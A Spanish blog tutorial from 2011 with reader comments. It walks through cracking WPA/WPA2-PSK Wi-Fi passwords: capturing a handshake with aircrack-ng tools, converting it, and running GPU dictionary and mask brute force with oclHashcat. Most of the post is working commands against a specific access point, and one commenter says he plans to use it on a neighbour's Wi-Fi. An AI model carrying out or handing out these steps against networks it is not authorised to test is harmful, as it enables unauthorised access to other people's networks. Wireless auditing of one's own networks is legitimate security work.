28 noviembre 2011

Usando la GPU para crackear la contraseña de WPA/WPA2-PSK con oclHashcat

Pyrit es una herramienta que permite utilizar la potencia de la GPU para crackear contraseñas de puntos de acceso wireless con WPA/WPA2-PSK. En la entrada de hoy, vamos a mostrar una alternativa: oclhashcat plus.

Lo primero es descargar e instalar la última versión de aircrack-ng, disponibles en: http://nightly.aircrack-ng.org/aircrack-ng/trunk/. Esto es importante ya que las últimas versiones incluyen dos opciones que no están disponibles en los paquetes que distribuyen algunos sistemas.

cd /tmp
wget -q hxxp://nightly.aircrack-ng.org/aircrack-ng/trunk/aircrack-ng-trunk-2011-11-19-r1997.tar.gz
tar -zxf aircrack-ng-trunk-2011-11-19-r1997.tar.gz
cd aircrack-ng-trunk-2011-11-19-r1997/
make && make install 

Tal y como en el siguiente ejemplo:


Lo siguiente es cambiar la tarjeta a modo monitor. En el caso de la Intel  Centrino Ultimate-N 6300 que viene con mi portátil, no hace falta parchear ningún driver ni nada adicional.

ifconfig wlan0 down
iwconfig wlan0 mode monitor
airmon-ng start wlan0


Lanzamos la aplicación airodump-ng para capturar la autenticación de un cliente, filtrando por el canal en el que transmite y el BSSID del punto de acceso. Utilizando el dispositivo mon0 creado después de ejecutar el airmon-ng start y almacenando los resultados en el fichero "dump".

airodump-ng -c 2 mon0 --bssid F4:EC:38:9F:D0:2D -w dump.pcap



Hasta aquí es más o menos lo que se lleva haciendo toda la vida para sacar la contraseña. Ahora para hacer fuerza bruta usando la GPU con oclhashcat plus, hay que seguir estos tres últimos pasos.

Para limpiar la captura y exportarla en otro formato para que pueda leerla la herramienta oclhashcat plus es necesaria la versión actualizada de aircrack-ng.

Ojo con la aplicación wpaclean, que tiene invertido el orden en el que se aceptan los ficheros. Primero el destino y después el origen. Con el primer comando se crea el archivo wpaclean.cap y con el segundo, partiendo de wpaclean.cap se genera el fichero final dump2.hccp

wpaclean wpaclean.cap dump.pcap-01.cap
aircrack-ng wpaclean.cap -J dump2

Otra opción para crear el archivo hccp es subir el cap a la página web: http://hashcat.net/cap2hccap/

Por último, se usa la última versión de oclhashcat+ indicando que es WPA (-m 2500) y que se use el diccionario de rockyou.

cudaHashcat-plus64.bin -m 2500 dump2.hccap rockyou.txt



En este ejemplo se observa una velocidad de 3900 intentos por segundo con la Nvidia Quadro 1000M del portatil,  a diferencia de la cpu i7 del mismo equipo, que con aircrack consigue 1020 keys por segundo o los 3300 intentos que obtiene pyrit usando la gpu también.

Si no hay suerte con los diccionarios más típicos, con la utilidad maskprocessor hay que generar mascaras para intentar sacarla con fuerza bruta tradicional. En este ejemplo se intentará con caracteres en minúsculas, mayúsculas, números y caracteres especiales con una longitud de 5:

mp64.bin -1=?l?u?d?s ?1?1?1?1?1 | ./clhashcat-plus64.bin -m 2500 dump2.hccap

16 comments :

Lisp dijo...

al final, "solamente" duplica la velocidad... WPA sigue siendo medianamente seguro.

Francisco Daniel dijo...

magnífico, gracias por vuestro trabajo, un anonimo

Alejandro Ramos dijo...

Realmente los números no soy demasiado válidos, ya que la cpu con la que he probado es muy rápida para ser una cpu y la gpu muy lenta para ser una gpu. Con una gpu "normal", los números son distintos, hasta 170.000 claves por segundo que daría una ATI 6990. 

aetsu dijo...

No conocía este software, tiene muy buena pinta. Sabes si soporta el uso de rainbow tables?¿

CoriDora dijo...

Y esto con el portátil... Con el de sobremesa (siempre que no tengas problemas técnicos de alimentación) tiene que ser tremendo!

Joser dijo...

No se de que hablas pero me parece bien, haber si leyendo todo paso a paso consigo pillarle el wifi al del 2º

Trefuño dijo...

Haber si tienes suerte

Blasbombin dijo...

Se dice a ver. Haber es un verbo.

KonsKul dijo...

Suena genial, pero una 6990 no baja de 600 €. Como un reto personal esta bien, pero desde el punto de vista economico no lo veo viable. (Muy buen articulo, gracias)

Alain Rojo dijo...

En lugar de pagar por una Pc tan poderosa, mejor pagar tu propio internet...

paes dijo...

Hola  a todos me
pueden ayudar con el fichero  *.cap,
capture demasiado (17MB) y en la pagina para transformar el fichero solo me permite
subir 5MB, alguien sabe como transformarlo, intente con el Wireshark pero no me
da esta opción creo?.

Juan Aguilera dijo...

Lo pone en el artículo:

aircrack-ng wpaclean.cap -J dump2

TheDark dijo...

Muchas gracias, muy buen aporte... pero me gustaría saber como serían los dos últimos comandos para iniciar Hashcat en vez de con Nvidia con Ati... Muchas gracias, seguid así :)

Alejandro Ramos dijo...

Los comandos son iguales, tan solo cambia el nombre del ejecutable. "cuda" para nvidia, "ocl" para ATI.

Suerte y gracias!

TheDarkRaider dijo...

Gracias... lo he probado y al menos en mi caso no hay una notable diferencia entre la CPU (1.400 k/s) y la GPU (1.700 k/s) lo cual se me ha hecho bastante raro pero bueno... ahora quería probar con otro ordenador q tengo en casa pero tiene una Intel HD Graphics 3000 para esa no hay soporte...? es decir solo es posible con las Nvidia y las ATI?

Alejandro Ramos dijo...

Todo depende de la tarjeta gráfica con aceleradora que tengas,
Si, solo es posible con ocl o cuda.
Un saludo.